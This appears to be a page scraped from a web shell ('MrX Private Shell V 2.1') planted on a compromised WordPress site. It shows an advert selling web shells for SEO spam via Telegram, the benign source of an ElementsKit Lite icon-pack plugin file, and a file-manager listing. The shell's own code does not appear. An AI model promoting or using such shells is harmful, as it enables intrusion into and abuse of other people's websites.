__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace ElementsKit_Lite\Modules\ElementsKit_Icon_Pack;
defined( 'ABSPATH' ) || exit;
class Icons {
public function __construct() {
add_action( 'wp_enqueue_scripts', array( $this, 'enqueue_frontend' ) );
add_filter( 'elementor/icons_manager/additional_tabs', array( $this, 'add_font' ) );
}
public function enqueue_frontend() {
wp_enqueue_style( 'elementor-icons-ekiticons', Init::get_url() . 'assets/css/ekiticons.css', array(), \ElementsKit_Lite::version() );
}
public function add_font( $font ) {
$font_new['ekiticons'] = array(
'name' => 'ekiticons',
'label' => esc_html__( 'ElementsKit Icon Pack', 'elementskit-lite' ),
'url' => Init::get_url() . 'assets/css/ekiticons.css',
'prefix' => 'icon-',
'displayPrefix' => 'icon',
'labelIcon' => 'icon icon-ekit',
'ver' => \ElementsKit_Lite::version(),
'fetchJson' => Init::get_url() . 'assets/js/ekiticons.json',
'native' => true,
);
return array_merge( $font, $font_new );
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| assets | Folder | 0775 |
|
|
| icon-list.php | File | 127.09 KB | 0664 |
|
| icons.php | File | 1.02 KB | 0664 |
|
| init.php | File | 6.15 KB | 0664 |
|